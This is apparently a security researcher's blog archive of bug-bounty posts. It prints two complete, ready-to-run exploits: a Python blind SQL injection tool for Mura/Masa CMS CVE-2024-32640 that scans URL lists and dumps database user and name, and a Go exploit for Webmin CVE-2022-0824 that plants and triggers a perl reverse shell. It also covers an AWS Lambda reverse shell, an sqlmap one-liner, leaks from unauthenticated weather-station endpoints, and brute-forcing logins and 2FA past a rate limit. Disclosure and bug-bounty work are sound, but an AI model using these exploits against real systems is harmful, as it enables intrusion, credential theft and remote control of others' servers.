Category Archives: cybersecurity

Mura/Masa CMS – SQL Injection CVE-2024-32640

A while back the illustrious team over at Project Discovery wrote about the discovery of an SQLi in Masa/Mura CMS. It’s a good writeup, so go check it out for the technical details.

Recently, I ran across four instances of this CMS in VDP/BB programs, and after searching for POCs out there, I didn’t find much in the way of a POC that would actually dump a little info to prove exploitation. One of them did download ghauri to do exploitation, but I wanted something standalone.

I do this because I want to make it as easy as possible to reproduce and triage. I seem to have bad luck with triagers on multiple platforms lately, including one that didn’t know how to PIP install a Python package, and one asking how to install Burp. Yes, you read that correctly.

Anyway, there were also some other features I always like to have like single-url scanning or scanning from a file or proxying, etc. So here is what I ended up with, as you can find on my GitHub. This will test for exploitability or retrieve the current username or DB name for MySQL.

#!/usr/bin/env python3

import requests
import argparse
import time
from urllib.parse import quote
from multiprocessing.dummy import Pool
import sys 

requests.packages.urllib3.disable_warnings()

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-32640 MySQL Blind SQL Injection Proof of Concept")
    parser.add_argument('-u', '--url', dest='url', type=str, help='Input URL for single target testing')
    parser.add_argument('-f', '--file', dest='file', type=str, help='File containing a list of URLs')
    parser.add_argument('-p', '--proxy', action='store_true', help='Use a proxy (localhost:8080)')
    parser.add_argument('--dump', dest='dump', choices=['dbname', 'user'], help='Dump specific information (e.g., dbname, user)')
    args = parser.parse_args()

    global proxies
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    } if args.proxy else None

    if args.dump:
        if args.url:
            if args.dump == 'dbname':
                dump_info(args.url, 'DATABASE()', quote('DATABASE()'))
            elif args.dump == 'user':
                dump_info(args.url, 'CURRENT_USER()', quote('CURRENT_USER()'))
        elif args.file:
            with open(args.file, 'r', encoding='utf-8') as fp:
                url_list = [line.strip() for line in fp]
            mp = Pool(10)
            if args.dump == 'dbname':
                mp.map(lambda url: dump_info(url, 'DATABASE()', quote('DATABASE()')), url_list)
            elif args.dump == 'user':
                mp.map(lambda url: dump_info(url, 'CURRENT_USER()', quote('CURRENT_USER()')), url_list)
            mp.close()
            mp.join()
    elif args.url and not args.file:
        poc(args.url)
    elif args.file:
        with open(args.file, 'r', encoding='utf-8') as fp:
            url_list = [line.strip() for line in fp]
        mp = Pool(10)
        mp.map(poc, url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usage:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    """Check if the target is vulnerable using a time-based SQL injection."""
    url_payload = '/index.cfm/_api/json/v1/default/?method=processAsyncObject'
    full_url = target + url_payload
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Cache-Control": "no-cache",
        "Referer": full_url
    }

    detection_payload = "x%5C%27+AND+%28SELECT+3504+FROM+%28SELECT%28SLEEP%285%29%29%29MQYa%29--+pizzapower"

    data = f"object=displayregion&contenthistid={detection_payload}&previewid=1"

    session = requests.Session()
    start_time = time.time()
    response = session.post(full_url, headers=headers, data=data, proxies=proxies, verify=False)
    elapsed_time = time.time() - start_time

    if elapsed_time >= 5:
        print(f'[+] The target {target} is vulnerable to SQL injection.')
        with open('result.txt', 'a') as f:
            f.write(target + '\n')
    else:
        print(f'[-] The target {target} does not appear to be vulnerable.')

def dump_info(target, readable_function, encoded_function):
    """Extract specified information (e.g., database name, user) using time-based blind SQL injection for MySQL."""
    url_payload = '/index.cfm/_api/json/v1/default/?method=processAsyncObject'
    full_url = target + url_payload
    headers = {
        "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
        "Cache-Control": "no-cache",
        "Referer": full_url
    }

    extracted_info = ""
    print(f"Extracting {readable_function} for {target}...")

    session = requests.Session()

    for i in range(1, 33):  # Assuming max length is 32 characters
        low, high = 32, 126 
        while low <= high:
            mid = (low + high) // 2
            full_sleep_time = 3
            payload = (f"x%5C%27%27+AND+%28SELECT+6666+FROM+%28SELECT%28SLEEP%28{full_sleep_time}-%28IF%28ORD%28MID%28%28IFNULL%28CAST%28{encoded_function}+AS+NCHAR%29%2C0x20%29%29%2C{i}%2C1%29%29%3E{mid}%2C0%2C1%29%29%29%29%29KLkb%29--+pizzapower")
            data = f"object=displayregion&contenthistid={payload}&previewid=1"

            start_time = time.time()
            session.post(full_url, headers=headers, data=data, proxies=proxies, verify=False)
            elapsed_time = time.time() - start_time
            if elapsed_time >= full_sleep_time:
                low = mid + 1 
            else:
                high = mid - 1 

        if high >= 32:
            extracted_info += chr(high + 1)
            print(f"Extracted so far for {readable_function}: {extracted_info}")
        else:
            break 

    if extracted_info:
        print(f"{readable_function} extracted: {extracted_info}")
        with open(f'{readable_function.lower()}_result.txt', 'a') as f:
            f.write(f'{target}: {extracted_info}\n')
    else:
        print(f"Failed to extract {readable_function} for {target}. Ensure the database type is MySQL.")

if __name__ == '__main__':
    main()

But wait! If you’re in a real big hurry, just run this SQLMap command to dump the current user 🀣

sqlmap -u "https://example.com/index.cfm/_api/json/v1/default/?method=processAsyncObject" \
       --data "object=displayregion&contenthistid=x%5C'*--+Arrv&previewid=1" \
       --level 3 --risk 2 --method POST \
       --technique=T \
       --timeout=5 \
       --dbms=mysql \
       --current-user \
       --batch
yes you should use a vps for bug bounty hunting

Bug Bounty VPS Box Part 2

Yes, you need a bug bounty VPS. Why you may ask? Well here is a list of reasons why.

Bypassing Bans

The truth of the matter is that you’ll likely get banned from sites, or even whole IP blocks, for malicious scanning and/or excessive scanning (i.e. scanning too quickly). Sure, you can likely hack away just fine on a single site manually with Burp from the comfort of your personal computer. But if you’re firing up a scanner, you better think twice. Use a VPS.

Callbacks

Sure, there are a lot of tools out there for long term callbacks like interactsh or bxss, but short term, it may be just easier to use a current server you are SSHd into. You got a blind XSS and you want to load a payload from your server to show impact? Just tail your web server logs.

I’ve even went so far as to deploy my own private Burp Collaborator instance as detailed here – https://portswigger.net/burp/documentation/collaborator/server/private

POCs

If you’re behind NAT on your home network, it’s gonna be hard to connect back to a listener if you somehow got an RCE on a network.

Or maybe you have a CORS bug or Postmesssage XSS and you need to host a POC somewhere. Sure you could forward ports from your router and fiddle around all day, but trust me, it’s way easier to just fire up a $5/month box on Linode and let it run 24/7.

Vertical and Horizontal Scaling Your Bug Bounty VPS Setup

Despite what a lot of people may tell you, essentially all of the leading bug bounty hunters do some sort of mass scanning. Now, with that said, they all do it to a different degree.

Automation is especially essential if you plan on making bug bounty hunting a source of passive, steady, and significant income. But you can’t do all of that without scaling. You need to scan more things faster which requires larger instances and greater numbers of them. Eventually your lowly desktop PC cannot handle all of this work.

For this you’d want to use axiom, or similar tooling.

Experience

This is underrated. No matter if you’re a IT professional with a ‘real’ job or a beginning bug bounty hunter, experience with cloud providers is invaluable. Deploying a server on AWS, Azure, or Linode (my choice for bug hunting) is valuable experience.

So?

Yes, you need a bug bounty VPS. Just use one. They’re cheap. You can even use this link and get a $100 credit at Linode, so it’s essentially free for a while too, haha.

Department of Defense Researcher of the Month

I was recently awarded the DoD Researcher of the Month for July, 2023. Between moving across the country and other hacking duties, I still had time to hammer away at a particular subdomain and found a bunch of stuff including a null byte truncated file extension file upload RCE that was present in multiple locations. Along with that I had some XSS, SQLi, and auth bypass, I think. I’m gonna try and repeat for August, since I’m on a roll, despite it only being VDP and not a Bug Bounty program. I have some good reports in, and a couple in the works, but I don’t know if they’ll be enough to win, lol. Hopefully I’ll get back to some bounty programs after August.

SQL Injection in Eufy Security Application

I found a textbook SQLi in the Eufy Security application.

Don’t mind the heavy use of red blocks to redact. The first, normal request. Everything looks fine. Notice the response time at 35 milliseconds.

a normal request as seen in Burp

The second request with a 10 second sleep payload. Notice the response time in the bottom right corner.

Was able to dump some info to confirm this was actually real.

It’s been reported and confirmed by Eufy.

Self-Hosted Security Part ? – Poor Rate Limiting in Organizr

Organizr is a self-hosted application written in PHP that basically helps you self-host other services at your home. It’s nifty application with a surprisingly large amount of functionality. I was recently poking at it to find some security holes, and the first thing I ran across was a rate limiting issue on the login function.

When making a POST request to login, there is a body parameter called loginAttempts. If your login fails, the value of this parameter is incremented (via client side JS) and included in the next login request. When the value reaches a certain number, which is verified in PHP on the backend, the user is locked out.

You can probably see where this is going. Just send it to Burp intruder and never increment the value. Tada!

POST request to login showing the loginAttemps parameter in the request body
loginAttempts is set to 1 and the request is sent to Burp Intruder for brute forcing

The PHP backend will always see the value of loginAttempts as 1, and brute forcing is allowed to occur.

The same endpoint and method is used to rate-limit 2FA code entry, which allows an attacker to also brute force a 2FA code. This takes a bit of time – I haven’t done the math – but it still works. An attacker can just sit back and fire away with Burp Intruder. A successful login will generate cookies that will work for their specified amount of time.

Burp screenshot showing the response when a successful 2FA code is submitted
Burp screenshot showing the response when a successful 2FA code is submitted

This issue has been reported on https://huntr.dev.

Webmin CVE-2022-0824 RCE in Golang

I’ve continued my quest to translate exploits into Golang. Here is an RCE in Webmin due to broken access controls. Please see the following links for more information.

https://nvd.nist.gov/vuln/detail/CVE-2022-0824

https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

https://www.webmin.com/security.html

You can also find this code on my Github.

import (
	"bytes"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"regexp"
	"runtime"
	"strings"
)

func check(e error) {
	if e != nil {
		fmt.Println(e)
	}
}

func makePayload(callbackIP string, callbackPort string) {
	payload := []byte("perl -e 'use Socket;$i=\"" + callbackIP + "\";$p=" + callbackPort + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash -i\")};'")
	err := os.WriteFile("./commands.cgi", payload, 0644)
	check(err)

	return
}

func login(client http.Client, target string, creds string) string {

	loginURL := target + "/session_login.cgi"

	params := "user=" + strings.Split(creds, ":")[0] + "&pass=" + strings.Split(creds, ":")[1]

	request, err := http.NewRequest("POST", loginURL, bytes.NewBufferString(params))
	if err != nil {
		log.Fatal(err)
	}

	request.Header.Set("Cookie", "redirect=1; testing=1")
	request.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	var sidCookie = ""

	resp, err := client.Do(request)
	if err != nil {
		log.Fatalln(err)
	} else {

		sidCookie = resp.Request.Response.Cookies()[0].Value
	}
	resp.Body.Close()
	// now use sid cookie to make sure it works to log in
	request, err = http.NewRequest("GET", target, nil)
	request.Header.Set("Cookie", "redirect=1; testing=1; sid="+sidCookie)

	resp, err = client.Do(request)
	if err != nil {
		log.Fatalln(err)
	}
	bodyBytes, err := io.ReadAll(resp.Body)
	bodyString := string(bodyBytes)
	resp.Body.Close()
	r, _ := regexp.Compile("System hostname")
	if !r.MatchString(bodyString) {
		fmt.Println("----> Unable to obtain sid cookie. Check your credentials.")
		return ""
	}

	return sidCookie
}

func runServer(serverURL string) {
	fmt.Println("--> Running a server on " + serverURL)
	serverPort := strings.Split(serverURL, ":")[1]

	exec.Command("setsid",
		"/usr/bin/python3",
		"-m",
		"http.server",
		serverPort,
		"0>&1 &").Output()

	fmt.Println("--> Server Started!")

	return
}

func downloadURL(client http.Client, target string, serverURL string, creds string, sid string) {

	URL := target + "/extensions/file-manager/http_download.cgi?module=filemin"

	serverIP := strings.Split(serverURL, ":")[0]
	serverPort := strings.Split(serverURL, ":")[1]

	bodyString := "link=http://" + serverIP + "/" + serverPort + "/commands.cgi&username=&password=&path=/usr/share/webmin"

	request, err := http.NewRequest("POST", URL, bytes.NewBufferString(bodyString))

	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func modifyPermissions(client http.Client, target string, serverURL string, creds string, sid string) {
	modifyURL := target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"

	bodyString := "name=commands.cgi&perms=0755&applyto=1&path=/usr/share/webmin"

	request, err := http.NewRequest("POST", modifyURL, bytes.NewBufferString(bodyString))

	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func execShell(client http.Client, target string, sid string) {
	fileLocation := target + "/commands.cgi"

	fmt.Println("--> Triggering shell. Check listener!")

	request, err := http.NewRequest("GET", fileLocation, nil)
	request.Header.Set("Cookie", "sid="+sid)

	resp, err := client.Do(request)
	if err != nil {
		fmt.Println((err))
	}

	resp.Body.Close()

	return
}

func stopServer() {
	out, _ := exec.Command("kill",
		"-9",
		"$(lsof",
		"-t",
		"-i:{self.pyhttp_port})").Output()
	fmt.Println("--> Killed Server!")
	output := string(out[:])
	fmt.Println(output)

	return
}

func main() {
	fmt.Println("--> Running Exploit! Ensure listener is running!")
	if runtime.GOOS == "windows" {
		fmt.Println("Can't Execute this on a windows machine")
		return
	}

	target := flag.String("t", "https://www.webmin.local:10000", "Target full URL, https://www.webmin.local:10000")
	creds := flag.String("c", "username:password", "Format, username:password")
	serverURL := flag.String("sl", "192.168.8.120:8787", " Http server for serving payload, ex 192.168.8.120:8080")
	callbackIP := flag.String("s", "127.0.0.1", " Callback IP to receive revshell")
	callbackPort := flag.String("p", "9999", " Callback port to receive revshell")

	flag.Parse()

	// uncomment the following to use a local proxy
	// proxyUrl, err := url.Parse("http://localhost:8080")
	// check(err)

	// tr := &http.Transport{
	// 	TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11,
	// 		MaxVersion: tls.VersionTLS11},
	// 	Proxy: http.ProxyURL(proxyUrl),
	// }
	// client := &http.Client{Transport: tr}

	// comment out these two lines if using the proxy above.
	tr := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true, PreferServerCipherSuites: true, MinVersion: tls.VersionTLS11, MaxVersion: tls.VersionTLS12}}
	client := &http.Client{Transport: tr}

	makePayload(*callbackIP, *callbackPort)
	sid := login(*client, *target, *creds)
	runServer(*serverURL)
	downloadURL(*client, *target, *serverURL, *creds, sid)
	modifyPermissions(*client, *target, *serverURL, *creds, sid)
	execShell(*client, *target, sid)
	stopServer()
}

A Quick AWS Lambda Reverse Shell

Let’s say you’re doing a pentest, and you run across access to AWS Lambda. I recently learned you can get a persistent shell (for 15 minutes, at least) via Lambda, which seemed odd to me because always just considered Lambda a repeatable, but ephemeral thing.

Anyway, first create lambda_function.py with the following code. Note that you’ll need a hostname to connect to. In my case, I used pizzapower.me.

Lambda reverse shell python code.

Next, zip this up into shell.zip.

Creating shell.zip that contains our reverse shell function.

Now we are going to create a Lambda function and upload our shell.zip with the following command

aws lambda create-function --function-name test --runtime python3.9 --handler lambda_function.lambda_handler --timeout 900 --zip-file fileb://shell.zip --role <The Amazon Resource Name (ARN) of the function's execution role>
Creating our function and uploading the code.

Don’t forget to start your listener, and when you are ready, trigger the function!

And catch the shell.

According to the docs, “a Lambda function always runs inside a VPC owned by the Lambda service.” But you can attach your function to your own VPC, so depending on how the victim’s AWS environment is configured, you may be able to pivot around and exploit some more stuff.

The Incredibly Insecure Weather Station – Part 2

Edit: The weather station issues were given CVE-2022-35122.

I contacted the manufacturer in regards to these issues. They responded quickly. I wasn’t expecting anything to be done about the issues that I brought up, but they did do something…

I logged into my weather station yesterday, an lo and behold, there is an update. Most notably the following, “added password encryption for HTTP transmission.”

Screenshot from the app itself showing the update notes.

Encryption for the password during HTTP transmission? What does this even mean? HTTPS? Why wouldn’t they just say HTTPS? Just encrypting the password client side and sending it to the station for decryption? That seems odd. I was hoping for HTTPS, but I would soon be let down.

curl request from before and after the ‘upgrade’

Before updating, I decided to try and make the curl request as I had done before to the get_device_info endpoint. As before, the password to the system was returned.

Next, I upgraded the device and then made the same request. Would you look at that, the APpwd now does look ‘encrypted.’ But, as you may have guessed, it is actually just base 64 encoded.

V2VhdGhlcjI0Njg5 –> Weather24689

bae64 decoding

Or, using jq, you can do this all on the CLI.

I think this is a losing battle.

The Incredibly Insecure Weather Station

Edit: This was given CVE-2022-35122.

I recently purchased the ECOWITT GW1102 Home Weather Station. It’s exactly what it sounds like – a mini weather station for your house. It has all the usual sensors you’d expect a weather station to have, and I’m actually very pleased with the hardware, considering the cheap price.

However, it is missing one thing – software security. But really, what did I expect from a cheap home weather station?

Comically, the landing page of the weather station’s server gives an illusion of some sort of security.

Password goes here.

Let’s intercept a request of us logging in.

Don’t steal my password.

This is all over HTTP. We post our password to /set_login_info – which seems like an odd endpoint for logging in. Notice the response does not set any cookies or seem like it actually does any sort of verification. Hmmm.

Anyway, after logging in, we are directed to /liveData.html. This page does exactly what its name implies. But let’s look at the links on the side of the page – particularly the Local Network link.

Click the Local Network link on the left-hand side.

If we intercept the requests in Burp after we click the Local Network link, we see a call to a /get_network_info endpoint. This returns info about the WiFi network to which the weather station is connected.

That’s my WiFi SSID and password.

Interesting. Notice again that there appears to be no authentication going on with this request. Let’s try to curl this endpoint

Uh oh.

Or how about the device password (not that you actually need the password now).

The password is now Weather24689 because I changed it without being authorized.

You can also do fun things like reboot the station, or get the user’s external weather reporting site’s API keys, etc. I notified ECOWITT support, but I’m assuming this won’t be fixed any time soon.

Edit: added this because someone didn’t understand this is an issue.

Edit: I added this picture above of the get_ws_settings endpoint. As you can see, I’m not using any authentication. You can also see I was trying some shenanigans, but nonetheless, you can also see this returns several API keys for other services, which is not a good thing to be handing out. It basically is the API endpoint for this page that is behind the ‘authentication’ of the application.

I did find some of these exposed to the internet, but I’d probably avoid that, if I were you. With that said, I actually like the hardware. It’s fun to play around with, and it is inexpensive.

Deploying and Configuring a Bug Bounty Box with Terraform and Ansible

Prerequisites and Getting Started

I sometimes like to spin up a virutal machine in the cloud, do some testing, and then tear it down. It doesn’t even have to be for bug bounty hunting, but since I’ve been hunting so sporadically lately, that’s what I’ve been using this project for.

Anyway, it becomes tedious to do this repeatedly, so I decided to automate a large majority of the infrastructure creation and configuration with Terraform and Ansible.

In the following article, I’ll deploy a node on Linode, my VPS provider of choice. Use this referral link for a $100, 60-day credit. That way, you can test this project out until you’re blue in the face. The node size I deploy in this post runs $10 a month.

While Terraform and Ansible can both accomplish the same things, they both have their wheel houses. Terraform should be used for deploying infrastructure and Ansible should be used to configure that infrastructure.

In order to follow along with this article, you’ll need to install Terraform and Ansible per your Operating System’s documentation. I’m using Ubuntu 20.10.

Let’s begin b creating a directory structure for your project.

mkdir -p ./bugbounty/{/terraform/templates,ansible}

Next, you’ll need to obtain credentials from Linode. If you haven’t already, create an account, then click on your account name in the top, right-hand corner and select “API Tokens.”

Select create an access token and give it a name. Select Linodes and Read/Write, and then click “Create Token.”

Linode Read/Write Access Token

The token will be a long string of characters. Save this token for usage in a bit!

Terraform

cd into the Terraform directory you just created and create the following files:

$ touch {main.tf,output.tf,variables.tf,variables.tfvars}

The main.tf file is where the magic is done. This file will create the VM to our specifications. The variables.tf file declares variables that are used in main.tf. variables.tfvars will have the initializing values for these variables. You can also initialize the variables directly in variables.tf or even on the command line, if you’d prefer. We do it this way because it makes updating variables slightly easier and our project simpler, in a sense. output.tf defines what values will be printed to the console after we run the project.

Next, create some templates within the templates directory.

touch {./templates/ansible.tmpl,./templates/playbook.tmpl,./templates/hosts}
main.tf

Copy the following code into main.tf:

terraform {
  required_providers {
    linode = {
      source  = "linode/linode"
      version = "1.27.0"
    }
  }
}

# Configure the Linode Provider
provider "linode" {
  token = var.token
}

# Create a Linode
resource "linode_instance" "bugbountybox" {
  image     = var.image
  label     = var.label
  region    = var.region
  type      = var.type
  root_pass = var.root_pass
}

# Create an Ansible playbook from a template file
resource "local_file" "bugbountybox_setup" {
  content = templatefile("./templates/playbook.tmpl",
    {
      ip_address = linode_instance.bugbountybox.ip_address
    }
  )
  file_permission = "0640"
  filename        = "../ansible/playbook.yml"
}

# Create an Ansible config from a template file. 
resource "local_file" "ansible_config" {
  content = templatefile("./templates/ansible.tmpl",
    {
      remote_user = "root"
    }
  )
  file_permission = "0640"
  filename        = "../ansible/ansible.cfg"
}

# Create an Ansible playbook from a template file
resource "local_file" "ansible_inventory" {
  content         = linode_instance.bugbountybox.ip_address
  file_permission = "0640"
  filename        = "../ansible/hosts"
}
variables.tf

Copy the following code into variables.tf:

variable "token" {
  type        = string
  description = "Linode APIv4 token."
  sensitive   = true
}

variable "image" {
  type        = string
  description = "Image to use for your VM."
  default     = "linode/ubuntu20.04"
}

variable "label" {
  type        = string
  description = "Label to give your VM."
}

variable "region" {
  type        = string
  description = "Region where the VM will be created."
}

variable "root_pass" {
  type        = string
  description = "Password for the root account on this VM."
  sensitive   = true
}

variable "type" {
  description = "Your Linode's plan type."
  # You can initialize variables here instead of the tfvars file. 
  default = "g6-standard-1"
}
variables.tfvars

Copy the following code into variables.tfvars, and enter the values as needed:

token     = "" # put your API token here. 
image     = "linode/ubuntu20.04"
label     = "bug-bounty-box"
region    = "us-east"
root_pass = "" # put your new VM's password here. 
output.tf

Copy the following code into output.tf:

output "IP_Address" {
  value = linode_instance.bugbountybox.ip_address
}

Templates

The templates will be used by Terraform to create files that Ansible will use. We could manually create/edit these Ansible files, but why do things manually when we can automate it?

Copy the following code into ansible.tmpl:

[defaults]
host_key_checking = False
remote_user = ${ remote_user }
ask_pass      = True

Copy the following code into playbook.tmpl:

---
- name: Update/upgrade and install packages on remote server.
  hosts: ${ ip_address }
  become: true
  tasks:
    - name: Update
      apt: update_cache=yes force_apt_get=yes cache_valid_time=3600

    - name: Upgrade all packages on servers
      apt: upgrade=dist force_apt_get=yes

    - name: Install packages
      apt:
        pkg:
          - ca-certificates
          - curl
          - apt-transport-https
          - lsb-release
          - gnupg
          - software-properties-common
          - python3-pip
          - unzip
          - tar
          - tmux
          - gobuster
          - wireguard
          - wireguard-tools
          - john
          - hashcat
          - nikto
          - ruby-full
          - ruby-railties
          - hydra
          - cewl
          - whois
          - squid
          - nmap
          - git
          - python3-impacket

        update_cache: true

    - name: Install Golang
      shell: |
        wget https://go.dev/dl/go1.18.linux-amd64.tar.gz
        tar -xvf go1.18.linux-amd64.tar.gz
        chown -R root:root ./go
        mv go /usr/local
        echo "export GOPATH=$HOME/go" >> $HOME/.bashrc
        echo "export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin" >> $HOME/.bashrc
      args:
        executable: /bin/bash

    - name: Install Amass
      shell: |
        curl -s https://api.github.com/repos/OWASP/Amass/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip amass* 
        chmod +x ./amass_linux_amd64/amass 
        mv ./amass_linux_amd64/amass /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Nuclei
      shell: |
        curl -s https://api.github.com/repos/projectdiscovery/nuclei/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip nuclei* nuclei
        chmod +x nuclei
        mv nuclei /usr/bin/
      args:
        executable: /bin/bash

    - name: Install FFUF
      shell: |
        curl -s https://api.github.com/repos/ffuf/ffuf/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
        tar xzf ffuf* ffuf
        chmod +x ffuf
        mv ffuf /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Subfinder
      shell: |
        curl -s https://api.github.com/repos/projectdiscovery/subfinder/releases/latest | grep "browser_download_url.*linux_amd64.zip" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip subfinder* subfinder
        chmod +x subfinder
        mv subfinder /usr/bin/
      args:
        executable: /bin/bash

    - name: Install Aquatone
      shell: |
        curl -s https://api.github.com/repos/michenriksen/aquatone/releases/latest | grep "browser_download_url.*linux_amd64-*" | cut -d : -f 2,3 | tr -d \" | wget -i -
        unzip aquatone* aquatone
        chmod +x aquatone 
        mv aquatone /usr/bin
      args:
        executable: /bin/bash

    - name: Install getallurls (gau)
      shell: |
        curl -s https://api.github.com/repos/lc/gau/releases/latest | grep "browser_download_url.*linux_amd64.tar.gz" | cut -d : -f 2,3 | tr -d \" | wget -i -
        tar xzf gau* gau 
        chmod +x gau 
        mv gau /usr/bin
      args:
        executable: /bin/bash

    - name: Install CrackMapExec
      shell: |
        wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.2.2/cme-ubuntu-latest.zip
        unzip cme-ubuntu-latest.zip -d "$HOME/tools/*"
        pip3 install cffi==1.14.5
      args:
        executable: /bin/bash

    - name: Reboot the box
      reboot:
        msg: "Reboot initiated by Ansible for updates"
        connect_timeout: 5
        reboot_timeout: 300
        pre_reboot_delay: 0
        post_reboot_delay: 30
        test_command: uptime

If you take a close look at these templates, you’ll see variables indicated with the following templating syntax:

${ variable_name }

These are “filled in” during the terraform apply process. We only have a single variable in each of these files, but you can use as many as you’d like depending on what you’re trying to accomplish. This is a very powerful feature. It allows you to dynamically create files to be used in other processes – in our case, Ansible.

It’s Alive!

We are ready to create our infrastructure by running the following commands within the terraform directory. Type “yes” when prompted after the apply command.

$ terraform init

$ terraform fmt

$ terraform validate

$ terraform apply -var-file="./variables.tfvars"

The terraform init command initializes the project directory. terraform fmt formats the files to the canonical style. terraform validate validates the project to ensure it will work properly. Finally, terraform apply creates your infrastructure using the tfvars file you specified.

If everything goes as planned, you should see output similar to this.

terraform apply output

As you can see, the IP address of our VM was present in the output as we specified in outputs.tf.

Ansible

During the infrastructure creation process, several files should have been created in the ansible directory. Ansible will use these files update/upgrade and install packages on our VM. From the ansible directory we run the following command to configure our new VM. At the start, you will be prompted for the SSH password that you used in your tfvars file.

$ ansible-playbook -i hosts playbook.yml

We need to specify the hosts file that Terraform created so Ansible doesn’t use the hosts file located in /etc/ansible.

This process will take a few minutes to complete, but if all went as planned, you should see something similar to this on your terminal.

Tear it Down

When you are all done playing around with your new VM, you can destroy it with the following command. Please remember to destroy it or else you will incur costs. Type “yes” when prompted.

$ terraform destroy -var-file="./variables.tfvars"

What’s Next?

Now, play around with the above project. Can you set it up to deploy multiple VMs? Can you set it up to deploy multiple VMs, install some other packages, run some commands and send the output of those commands to a database somewhere? Can you set this up on multiple clouds?

The example here is pretty basic, and doesn’t necessarily follow best practices (especially with Ansible), but it gives you the idea of what can be done with automation. Some, if not all, of the leading bug bounty hunters are at least partially automating their work. You should automate too.

Feel free to download all this code from my github and don’t forget to use my link to sign up for a Linode account.

Links

Here are some links to more information and documentation that is pertinent to this article, including a link to this code on Github.

https://www.github.com/pizza-power/bugbountyboxautomation

https://www.terraform.io/cli

https://www.linode.com/docs/guides/how-to-build-your-infrastructure-using-terraform-and-linode/

https://registry.terraform.io/providers/linode/linode/latest/docs